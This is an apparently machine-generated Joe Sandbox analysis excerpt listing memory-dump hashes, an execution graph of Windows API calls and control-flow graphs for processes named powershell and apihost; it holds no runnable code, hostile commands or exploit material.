                                                                                                                                • Instruction Fuzzy Hash: D6012BB150C3814FC327872C0D2001A6FF6AFE3910719469BC950DF76AC4298C09C366
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.2336655844.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_70c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                • API String ID: 0-978391646
                                                                                                                                • Opcode ID: 58a9634663e48ee30cf74f496f500f4bbd84017570668a28cb8d8b6e00cead6c
                                                                                                                                • Instruction ID: 717120c704f42de73620f614ae37e8a8f974e6c002d41c524ad62d5bcd3ac32e
                                                                                                                                • Opcode Fuzzy Hash: 58a9634663e48ee30cf74f496f500f4bbd84017570668a28cb8d8b6e00cead6c
                                                                                                                                • Instruction Fuzzy Hash: 44F02070754216DBC6BC576C2D2066E94EFABC0E10B358A2FD8529B344CE228C02C7EE

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:11.5%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:390
                                                                                                                                Total number of Limit Nodes:35
                                                                                                                                execution_graph 27614 9fd01c 27615 9fd034 27614->27615 27616 9fd08e 27615->27616 27624 4db4d79 27615->27624 27632 4db1b44 27615->27632 27636 4db4017 27615->27636 27642 4db4150 27615->27642 27645 4db1b5c 27615->27645 27649 4db1b6c 27615->27649 27657 4db4028 27615->27657 27628 4db4db5 27624->27628 27625 4db4de9 27626 4db4de7 27625->27626 27673 4db1c94 27625->27673 27628->27625 27629 4db4dd9 27628->27629 27663 4db4f10 27629->27663 27668 4db4f00 27629->27668 27633 4db1b55 27632->27633 27634 4db4167 27633->27634 27739 4db1b94 27633->27739 27634->27616 27637 4db404e 27636->27637 27638 4db1b5c SetWindowLongW 27637->27638 27639 4db405a 27638->27639 27640 4db1b6c CallWindowProcW 27639->27640 27641 4db406f 27640->27641 27641->27616 27643 4db1b94 SetWindowLongW 27642->27643 27644 4db4167 27643->27644 27644->27616 27646 4db1b67 27645->27646 27647 4db4167 27646->27647 27648 4db1b94 SetWindowLongW 27646->27648 27647->27616 27648->27647 27652 4db1b77 27649->27652 27650 4db4de9 27651 4db1c94 CallWindowProcW 27650->27651 27654 4db4de7 27650->27654 27651->27654 27652->27650 27653 4db4dd9 27652->27653 27655 4db4f10 CallWindowProcW 27653->27655 27656 4db4f00 CallWindowProcW 27653->27656 27655->27654 27656->27654 27658 4db404e 27657->27658 27659 4db1b5c SetWindowLongW 27658->27659 27660 4db405a 27659->27660 27661 4db1b6c CallWindowProcW 27660->27661 27662 4db406f 27661->27662 27662->27616 27665 4db4f24 27663->27665 27664 4db4fb0 27664->27626 27677 4db4fb9 27665->27677 27681 4db4fc8 27665->27681 27670 4db4f24 27668->27670 27669 4db4fb0 27669->27626 27671 4db4fb9 CallWindowProcW 27670->27671 27672 4db4fc8 CallWindowProcW 27670->27672 27671->27669 27672->27669 27674 4db1c9f 27673->27674 27675 4db664a CallWindowProcW 27674->27675 27676 4db65f9 27674->27676 27675->27676 27676->27626 27678 4db4fd9 27677->27678 27685 4dbba30 27677->27685 27689 4dbba40 27677->27689 27678->27664 27682 4db4fd9 27681->27682 27683 4dbba40 CallWindowProcW 27681->27683 27684 4dbba30 CallWindowProcW 27681->27684 27682->27664 27683->27682 27684->27682 27686 4dbba3d 27685->27686 27693 4dbbd43 27686->27693 27687 4dbbad8 27687->27678 27690 4dbba73 27689->27690 27692 4dbbd43 CallWindowProcW 27690->27692 27691 4dbbad8 27691->27678 27692->27691 27694 4dbbd69 27693->27694 27695 4dbbeb6 27694->27695 27698 4dbc30f 27694->27698 27704 4dbc340 27694->27704 27695->27687 27699 4dbc320 27698->27699 27699->27695 27700 4dbc34b 27699->27700 27710 4dbc368 27699->27710 27718 4dbc370 27699->27718 27700->27695 27701 4dbc358 27701->27695 27705 4dbc34b 27704->27705 27706 4dbc352 27704->27706 27705->27695 27708 4dbc368 CallWindowProcW 27706->27708 27709 4dbc370 CallWindowProcW 27706->27709 27707 4dbc358 27707->27695 27708->27707 27709->27707 27711 4dbc37e 27710->27711 27712 4dbc3a0 27710->27712 27715 4dbc38c 27711->27715 27726 4db5980 27711->27726 27713 4db5980 CallWindowProcW 27712->27713 27717 4dbc3a7 27713->27717 27715->27701 27716 4dbc3c8 27716->27701 27717->27701 27719 4dbc37e 27718->27719 27720 4dbc3a0 27718->27720 27722 4db5980 CallWindowProcW 27719->27722 27723 4dbc38c 27719->27723 27721 4db5980 CallWindowProcW 27720->27721 27725 4dbc3a7 27721->27725 27724 4dbc3c8 27722->27724 27723->27701 27724->27701 27725->27701 27728 4db59cc 27726->27728 27727 4db5c6c 27727->27716 27728->27727 27731 4dbc3d0 27728->27731 27735 4dbc3e0 27728->27735 27732 4dbc3d2 27731->27732 27733 4db1c94 CallWindowProcW 27732->27733 27734 4dbc449 27732->27734 27733->27734 27734->27727 27736 4dbc426 27735->27736 27737 4db1c94 CallWindowProcW 27736->27737 27738 4dbc449 27736->27738 27737->27738 27738->27727 27741 4db1b9f 27739->27741 27740 4db43f6 27741->27740 27743 4db4088 27741->27743 27746 4db1b7c 27743->27746 27747 4db40b8 SetWindowLongW 27746->27747 27749 4db40a0 27747->27749 27749->27740 27750 4db6718 27751 4db6728 27750->27751 27755 4dbd478 27751->27755 27761 4dbd468 27751->27761 27752 4db6751 27756 4dbd4ad 27755->27756 27767 4db7d60 27756->27767 27758 4dbd502 27779 4dbb930 27758->27779 27760 4dbd509 27760->27752 27762 4dbd46a 27761->27762 27763 4db7d60 5 API calls 27762->27763 27764 4dbd502 27763->27764 27765 4dbb930 5 API calls 27764->27765 27766 4dbd509 27765->27766 27766->27752 27768 4db7d8c 27767->27768 27769 4db7fc4 27768->27769 27789 4db798c 27768->27789 27771 4db6890 5 API calls 27769->27771 27772 4db816c 27769->27772 27771->27772 27772->27758 27773 4db7e45 27774 4db6890 5 API calls 27773->27774 27778 4db7eed 27773->27778 27775 4db7eb7 27774->27775 27776 4db6890 5 API calls 27775->27776 27776->27778 27795 4db6890 27778->27795 27780 4dbb93b 27779->27780 27781 4dbd72f 27780->27781 27783 4dbd767 27780->27783 27788 4dbd736 27780->27788 27782 4db6890 5 API calls 27781->27782 27782->27788 27784 4dbd7b8 27783->27784 27785 4dbd78c 27783->27785 27786 4db6890 5 API calls 27784->27786 27787 4db6890 5 API calls 27785->27787 27786->27788 27787->27788 27788->27760 27793 4db7997 27789->27793 27790 4db8307 27790->27773 27791 4db6890 5 API calls 27792 4db82c9 27791->27792 27792->27790 27792->27791 27793->27790 27793->27792 27794 4db6890 5 API calls 27793->27794 27794->27792 27796 4db68a0 27795->27796 27797 4db68dd 27796->27797 27800 4dbadd8 27796->27800 27825 4dbade8 27796->27825 27797->27769 27804 4dbae21 27800->27804 27801 4dbaf1b 27802 4db2208 5 API calls 27801->27802 27811 4dbaef0 27801->27811 27802->27811 27804->27801 27806 4dbaebf 27804->27806 27850 4db2208 27806->27850 27808 4dbaf35 27875 4db8e88 27808->27875 27855 4db8ef4 27811->27855 27812 4dbaf3d 27813 4dbb047 27812->27813 27814 4db6890 5 API calls 27812->27814 27879 4db16c0 27813->27879 27886 4db16b0 27813->27886 27815 4dbafed 27814->27815 27818 4db4088 SetWindowLongW 27815->27818 27816 4dbb0a8 27893 4dba8d0 27816->27893 27897 4dba8c1 27816->27897 27817 4dbb0bc 27819 4dbb010 27818->27819 27819->27813 27901 4db8f64 27819->27901 27829 4dbae21 27825->27829 27826 4dbaf1b 27827 4db2208 5 API calls 27826->27827 27836 4dbaef0 27826->27836 27827->27836 27828 4db8ef4 5 API calls 27830 4dbaf2b 27828->27830 27829->27826 27831 4dbaebf 27829->27831 27832 4db8f04 5 API calls 27830->27832 27835 4db2208 5 API calls 27831->27835 27833 4dbaf35 27832->27833 27834 4db8e88 5 API calls 27833->27834 27837 4dbaf3d 27834->27837 27835->27836 27836->27828 27838 4dbb047 27837->27838 27839 4db6890 5 API calls 27837->27839 27846 4db16c0 2 API calls 27838->27846 27847 4db16b0 2 API calls 27838->27847 27840 4dbafed 27839->27840 27843 4db4088 SetWindowLongW 27840->27843 27841 4dbb0a8 27848 4dba8c1 5 API calls 27841->27848 27849 4dba8d0 5 API calls 27841->27849 27842 4dbb0bc 27844 4dbb010 27843->27844 27844->27838 27845 4db8f64 5 API calls 27844->27845 27845->27838 27846->27841 27847->27841 27848->27842 27849->27842 27852 4db2239 27850->27852 27854 4db2347 27850->27854 27851 4db2245 27851->27811 27852->27851 27908 4db19f0 KiUserCallbackDispatcher KiUserCallbackDispatcher SetWindowLongW SendMessageW CreateIconFromResourceEx 27852->27908 27854->27811 27857 4db8eff 27855->27857 27856 4dbaf2b 27861 4db8f04 27856->27861 27857->27856 27858 4db6890 5 API calls 27857->27858 27859 4dbd9f0 27858->27859 27860 4db4088 SetWindowLongW 27859->27860 27860->27856 27864 4db8f0f 27861->27864 27862 4dbdf5a 27863 4db8f64 5 API calls 27862->27863 27868 4dbdf66 27863->27868 27865 4dbdf74 27864->27865 27873 4dbdfa8 27864->27873 27874 4dbdf21 27864->27874 27915 4dbba14 KiUserCallbackDispatcher KiUserCallbackDispatcher SetWindowLongW SendMessageW CreateIconFromResourceEx 27864->27915 27872 4db6890 5 API calls 27865->27872 27865->27873 27866 4db8f64 5 API calls 27867 4dbdf4c 27866->27867 27909 4dbda44 27867->27909 27870 4dbda44 5 API calls 27868->27870 27870->27865 27872->27873 27873->27808 27874->27862 27874->27866 27876 4db8e93 27875->27876 27877 4db6890 5 API calls 27876->27877 27878 4dba914 27876->27878 27877->27878 27878->27812 27880 4db16e5 27879->27880 27881 4db16df 27879->27881 27880->27816 27881->27880 27882 4db1818 KiUserCallbackDispatcher 27881->27882 27919 5be0ad8 27881->27919 27924 5be0ac9 27881->27924 27882->27880 27887 4db16c0 27886->27887 27888 4db1818 KiUserCallbackDispatcher 27887->27888 27890 5be0ad8 SetWindowLongW 27887->27890 27891 5be0ac9 SetWindowLongW 27887->27891 27892 4db16e5 27887->27892 27888->27892 27890->27888 27891->27888 27892->27816 27894 4dba8dd 27893->27894 27895 4db8e88 5 API calls 27894->27895 27896 4dba8e4 27895->27896 27896->27817 27898 4dba8dd 27897->27898 27899 4db8e88 5 API calls 27898->27899 27900 4dba8e4 27899->27900 27900->27817 27903 4db8f6f 27901->27903 27902 4dbfbee 27902->27813 27903->27902 27904 4db6890 5 API calls 27903->27904 27905 4dbfc48 27904->27905 27906 4dbe460 SendMessageW 27905->27906 27907 4dbfc59 27906->27907 27907->27813 27908->27854 27910 4dbda4f 27909->27910 27911 4dbfc48 27910->27911 27912 4db6890 5 API calls 27910->27912 27916 4dbe460 27911->27916 27912->27911 27915->27874 27917 4dbfc70 SendMessageW 27916->27917 27918 4dbfc59 27917->27918 27918->27862 27920 5be0ae8 27919->27920 27922 4db4088 SetWindowLongW 27920->27922 27929 4db4077 27920->27929 27921 5be0afa 27921->27882 27922->27921 27925 5be0ae8 27924->27925 27927 4db4088 SetWindowLongW 27925->27927 27928 4db4077 SetWindowLongW 27925->27928 27926 5be0afa 27926->27882 27927->27926 27928->27926 27930 4db4088 27929->27930 27931 4db1b7c SetWindowLongW 27930->27931 27932 4db40a0 27931->27932 27932->27921 27933 caf6c0 27934 caf706 GetCurrentProcess 27933->27934 27936 caf758 GetCurrentThread 27934->27936 27937 caf751 27934->27937 27938 caf78e 27936->27938 27939 caf795 GetCurrentProcess 27936->27939 27937->27936 27938->27939 27942 caf7cb 27939->27942 27940 caf7f3 GetCurrentThreadId 27941 caf824 27940->27941 27942->27940 27991 4db3e70 27992 4db3ed8 CreateWindowExW 27991->27992 27994 4db3f94 27992->27994 27995 ca5238 27996 ca524f 27995->27996 28002 ca4e0c 27996->28002 27998 ca52be 28006 5be16b8 27998->28006 28010 5be1660 27998->28010 28003 ca4e17 28002->28003 28005 4db6890 5 API calls 28003->28005 28004 ca7abe 28004->27998 28005->28004 28007 5be16c7 28006->28007 28014 5be12f4 28007->28014 28011 5be1648 28010->28011 28011->28010 28012 5be12f4 OleInitialize 28011->28012 28013 ca52c5 28012->28013 28016 5be12ff 28014->28016 28018 5be1334 28016->28018 28017 5be17ad 28017->28017 28019 5be133f 28018->28019 28020 5be1a28 28019->28020 28021 5be15a8 OleInitialize 28019->28021 28023 5be1a40 28019->28023 28020->28023 28024 5be15a8 28020->28024 28021->28020 28023->28017 28026 5be15b3 28024->28026 28025 5be2df9 28025->28023 28026->28025 28028 5be2194 28026->28028 28029 5be219f 28028->28029 28031 5be3113 28029->28031 28032 5be21b0 28029->28032 28031->28025 28033 5be3148 OleInitialize 28032->28033 28034 5be31ac 28033->28034 28034->28031 27943 4dbc548 27944 4dbc340 CallWindowProcW 27943->27944 27945 4dbc556 27944->27945 27946 4dbe108 27947 4dbe119 27946->27947 27950 4dbe183 27947->27950 27951 4dbdaac 27947->27951 27952 4dbdab7 27951->27952 27953 4dbe17c 27952->27953 27955 4dbf898 27952->27955 27957 4dbf8c2 27955->27957 27956 4dbf8cf 27956->27953 27957->27956 27958 4dbf8e7 CreateIconFromResourceEx 27957->27958 27959 4dbf976 27958->27959 27959->27953 27960 4db9108 27961 4db911f 27960->27961 27963 4db8cd8 27960->27963 27964 4db8ce3 27963->27964 27965 4db91d8 27964->27965 27969 4db91f8 27964->27969 27974 4db91e9 27964->27974 27965->27961 27966 4db91a2 27966->27961 27971 4db921f 27969->27971 27972 4db943d 27971->27972 27979 4db9659 27971->27979 27972->27966 27976 4db921f 27974->27976 27975 4db9473 27975->27966 27977 4db943d 27976->27977 27978 4db9659 5 API calls 27976->27978 27977->27966 27978->27975 27980 4db9697 27979->27980 27981 4db971e 27980->27981 27982 4db6890 5 API calls 27980->27982 27982->27981 28035 4db03e8 28036 4db0410 28035->28036 28037 4db0438 28036->28037 28040 4db0498 28036->28040 28048 4db0480 28036->28048 28047 4db04a7 28040->28047 28041 4db04d0 28045 4db2208 5 API calls 28041->28045 28068 4db21f0 28041->28068 28042 4db04e1 28042->28037 28045->28042 28056 4db15b0 28047->28056 28062 4db15a0 28047->28062 28053 4db04a7 28048->28053 28049 4db04d0 28051 4db2208 5 API calls 28049->28051 28052 4db21f0 5 API calls 28049->28052 28050 4db04e1 28050->28037 28051->28050 28052->28050 28054 4db15b0 3 API calls 28053->28054 28055 4db15a0 3 API calls 28053->28055 28054->28049 28055->28049 28058 4db15cc 28056->28058 28057 4db161c 28057->28041 28059 4db1621 28058->28059 28060 4db16c0 2 API calls 28058->28060 28061 4db16b0 2 API calls 28058->28061 28059->28041 28060->28057 28061->28057 28064 4db15b0 28062->28064 28063 4db161c 28063->28041 28065 4db1621 28064->28065 28066 4db16c0 2 API calls 28064->28066 28067 4db16b0 2 API calls 28064->28067 28065->28041 28066->28063 28067->28063 28069 4db21e4 28068->28069 28070 4db21fa 28068->28070 28069->28042 28072 4db2245 28070->28072 28073 4db19f0 KiUserCallbackDispatcher KiUserCallbackDispatcher SetWindowLongW SendMessageW CreateIconFromResourceEx 28070->28073 28072->28042 28073->28072 28074 4dbd528 28075 4dbd56a 28074->28075 28076 4dbd570 SetWindowTextW 28074->28076 28075->28076 28077 4dbd5a1 28076->28077 27983 4db800c 27984 4db8015 27983->27984 27986 4db8033 27983->27986 27985 4db6890 5 API calls 27984->27985 27984->27986 27985->27986 27987 4db6890 5 API calls 27986->27987 27988 4db816c 27986->27988 27987->27988 27989 cafd10 DuplicateHandle 27990 cafda6 27989->27990 28078 cad330 28081 cad418 28078->28081 28079 cad33f 28082 cad439 28081->28082 28083 cad45c 28081->28083 28082->28083 28084 cad660 GetModuleHandleW 28082->28084 28083->28079 28085 cad68d 28084->28085 28085->28079

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 744 caf6b2-caf74f GetCurrentProcess 748 caf758-caf78c GetCurrentThread 744->748 749 caf751-caf757 744->749 750 caf78e-caf794 748->750 751 caf795-caf7c9 GetCurrentProcess 748->751 749->748 750->751 753 caf7cb-caf7d1 751->753 754 caf7d2-caf7ed call cafc98 751->754 753->754 756 caf7f3-caf822 GetCurrentThreadId 754->756 758 caf82b-caf88d 756->758 759 caf824-caf82a 756->759 759->758
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00CAF73E
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00CAF77B
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00CAF7B8
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CAF811
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 29478f53934bce88e6fec5a14c68e567b1ac133d056ceb73b148f19038ac74ae
                                                                                                                                • Instruction ID: d5405c9fca60fff99750cfbb074329ecc01aa0fcb6097867846dd14469616bc8
                                                                                                                                • Opcode Fuzzy Hash: 29478f53934bce88e6fec5a14c68e567b1ac133d056ceb73b148f19038ac74ae
                                                                                                                                • Instruction Fuzzy Hash: 1E5174B090134A8FCB14DFAAD548BAEBBF1EF49304F20C4ADE419A7361D7389945CB65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 766 caf6c0-caf74f GetCurrentProcess 770 caf758-caf78c GetCurrentThread 766->770 771 caf751-caf757 766->771 772 caf78e-caf794 770->772 773 caf795-caf7c9 GetCurrentProcess 770->773 771->770 772->773 775 caf7cb-caf7d1 773->775 776 caf7d2-caf7ed call cafc98 773->776 775->776 778 caf7f3-caf822 GetCurrentThreadId 776->778 780 caf82b-caf88d 778->780 781 caf824-caf82a 778->781 781->780
                                                                                                                                APIs
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00CAF73E
                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00CAF77B
                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00CAF7B8
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00CAF811
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                • Opcode ID: 13affad13f1d2e5ce54d9ffe9b11625ad346c2348e76697def0ec5983f5e8cfb
                                                                                                                                • Instruction ID: 4f0249d6595d5e451d740a04fc295502ca4253e0eea0a881729b32e4627f2665
                                                                                                                                • Opcode Fuzzy Hash: 13affad13f1d2e5ce54d9ffe9b11625ad346c2348e76697def0ec5983f5e8cfb
                                                                                                                                • Instruction Fuzzy Hash: 265164B090030A8FDB14DFAAD548BAEBBF1EF49304F20C469E519A7360D7789945CB65

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 842 4db16c0-4db16d9 843 4db16df-4db16e3 842->843 844 4db175c-4db175f 842->844 845 4db1760-4db17ce 843->845 846 4db16e5-4db16ff 843->846 866 4db1888-4db188d 845->866 867 4db17d4-4db17fa 845->867 851 4db1713-4db1735 846->851 852 4db1701-4db1708 846->852 859 4db173c-4db173e 851->859 852->851 854 4db170a-4db170c 852->854 854->851 860 4db1740-4db174c 859->860 861 4db1755 859->861 860->861 865 4db174e 860->865 861->844 865->861 871 4db180a-4db180f 867->871 872 4db17fc-4db1807 867->872 873 4db1818-4db1820 871->873 874 4db1811 871->874 872->871 875 4db1822-4db183b 873->875 876 4db1845-4db187e KiUserCallbackDispatcher 873->876 882 4db1813 call 5be0ad8 874->882 883 4db1813 call 5be0ac9 874->883 875->876 880 4db1883 call 5be0ea2 876->880 881 4db1883 call 5be0eb0 876->881 880->866 881->866 882->873 883->873
                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,037F4164,0289FF6C,?,00000000,?,00000000,00000000), ref: 04DB1877
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID: Haq
                                                                                                                                • API String ID: 2492992576-725504367
                                                                                                                                • Opcode ID: 22c3c780f66b6742d6462556b28a2d7fb7cd5382826e29a343b3523ec725efc6
                                                                                                                                • Instruction ID: 9a5633735f16b9f0830e77603a600aba77473608f3c06a3794fde291b117e8a6
                                                                                                                                • Opcode Fuzzy Hash: 22c3c780f66b6742d6462556b28a2d7fb7cd5382826e29a343b3523ec725efc6
                                                                                                                                • Instruction Fuzzy Hash: 6C5178343006119FC728EB69D865B6E77E6BF86B54B158469E446CB3A2CF74EC0287A0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 909 cad418-cad437 910 cad439-cad446 call cac720 909->910 911 cad463-cad467 909->911 918 cad448 910->918 919 cad45c 910->919 913 cad47b-cad4bc 911->913 914 cad469-cad473 911->914 920 cad4c9-cad4d7 913->920 921 cad4be-cad4c6 913->921 914->913 964 cad44e call cad6c0 918->964 965 cad44e call cad6b0 918->965 919->911 922 cad4fb-cad4fd 920->922 923 cad4d9-cad4de 920->923 921->920 928 cad500-cad507 922->928 925 cad4e9 923->925 926 cad4e0-cad4e7 call cac72c 923->926 924 cad454-cad456 924->919 927 cad598-cad658 924->927 932 cad4eb-cad4f9 925->932 926->932 959 cad65a-cad65d 927->959 960 cad660-cad68b GetModuleHandleW 927->960 929 cad509-cad511 928->929 930 cad514-cad51b 928->930 929->930 933 cad528-cad531 call cac73c 930->933 934 cad51d-cad525 930->934 932->928 940 cad53e-cad543 933->940 941 cad533-cad53b 933->941 934->933 942 cad561-cad56e 940->942 943 cad545-cad54c 940->943 941->940 949 cad570-cad58e 942->949 950 cad591-cad597 942->950 943->942 945 cad54e-cad55e call cac74c call cac75c 943->945 945->942 949->950 959->960 961 cad68d-cad693 960->961 962 cad694-cad6a8 960->962 961->962 964->924 965->924
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00CAD67E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3484821889.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_ca0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: fc8a0215accff96a08a30583ef6a5ad4768d0f673ebed3accf7e5524ef3a17af
                                                                                                                                • Instruction ID: 152b4c2cc3b90caddb7917b07bde721c6bf03d985ca135a0ce0b1999e3c9d703
                                                                                                                                • Opcode Fuzzy Hash: fc8a0215accff96a08a30583ef6a5ad4768d0f673ebed3accf7e5524ef3a17af
                                                                                                                                • Instruction Fuzzy Hash: 7B8135B0A00B468FD724DF6AD0457AABBF1FF89308F00892DD49AD7A51DB74E945CB90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 966 4db3e64-4db3ed6 968 4db3ed8-4db3ede 966->968 969 4db3ee1-4db3ee8 966->969 968->969 970 4db3eea-4db3ef0 969->970 971 4db3ef3-4db3f2b 969->971 970->971 972 4db3f33-4db3f92 CreateWindowExW 971->972 973 4db3f9b-4db3fd3 972->973 974 4db3f94-4db3f9a 972->974 978 4db3fe0 973->978 979 4db3fd5-4db3fd8 973->979 974->973 980 4db3fe1 978->980 979->978 980->980
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB3F82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 31731a4d8e2901f9ae6fe94cf16c6cbe5cd943d40d534f6dcd7586da4f4beb5c
                                                                                                                                • Instruction ID: cb3b60edf175fb42de4599e04f1d4daa1ea6242b6405760d1812469e98af528b
                                                                                                                                • Opcode Fuzzy Hash: 31731a4d8e2901f9ae6fe94cf16c6cbe5cd943d40d534f6dcd7586da4f4beb5c
                                                                                                                                • Instruction Fuzzy Hash: E651B0B1D00349DFDB14CF99C894ADEFBB5BF48310F64822AE819AB250D775A985CF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 981 4db3e70-4db3ed6 982 4db3ed8-4db3ede 981->982 983 4db3ee1-4db3ee8 981->983 982->983 984 4db3eea-4db3ef0 983->984 985 4db3ef3-4db3f92 CreateWindowExW 983->985 984->985 987 4db3f9b-4db3fd3 985->987 988 4db3f94-4db3f9a 985->988 992 4db3fe0 987->992 993 4db3fd5-4db3fd8 987->993 988->987 994 4db3fe1 992->994 993->992 994->994
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB3F82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 9155f66ab618d5fe2bc196d7d409174bec712acbf10dc6827e619ea0691e5c62
                                                                                                                                • Instruction ID: 56984c14eef9880798e94e84195bb61444440982a82c99d49f75eac04547a0ed
                                                                                                                                • Opcode Fuzzy Hash: 9155f66ab618d5fe2bc196d7d409174bec712acbf10dc6827e619ea0691e5c62
                                                                                                                                • Instruction Fuzzy Hash: E741B0B1D00359DFDB14CF9AC884ADEFBB5BF48310F64812AE819AB250D775A985CF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 995 4db1c94-4db65ec 998 4db669c-4db66bc call 4db1b6c 995->998 999 4db65f2-4db65f7 995->999 1006 4db66bf-4db66cc 998->1006 1000 4db664a-4db6682 CallWindowProcW 999->1000 1001 4db65f9-4db6630 999->1001 1003 4db668b-4db669a 1000->1003 1004 4db6684-4db668a 1000->1004 1008 4db6639-4db6648 1001->1008 1009 4db6632-4db6638 1001->1009 1003->1006 1004->1003 1008->1006 1009->1008
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DB6671
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.3497592130.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_4db0000_apihost.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: fe2654e2eb8b1b6ac631582f1212cb1c42e4984747b018b0e319b0651a6eb2b0
                                                                                                                                • Instruction ID: 11803f2654be646652bad8e3f76436efda5a6cdcffa8ea0214d605818e4075bc
                                                                                                                                • Opcode Fuzzy Hash: fe2654e2eb8b1b6ac631582f1212cb1c42e4984747b018b0e319b0651a6eb2b0
                                                                                                                                • Instruction Fuzzy Hash: 624125B4A00309CFCB14CF99C488AAABBF5FB88314F24C499D559AB321D334E841CFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1012 4dbf898-4dbf8cd call 4dbe41c 1015 4dbf8cf-4dbf8df call 4dbf368 1012->1015 1016 4dbf8e2-4dbf974 CreateIconFromResourceEx 1012->1016 1020 4dbf97d-4dbf99a 1016->1020 1021 4dbf976-4dbf97c 1016->1021 1021->1020
                                                                                                                                APIs
                                                                                                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 04DBF967
                                                                                                                                Memory Dump Source
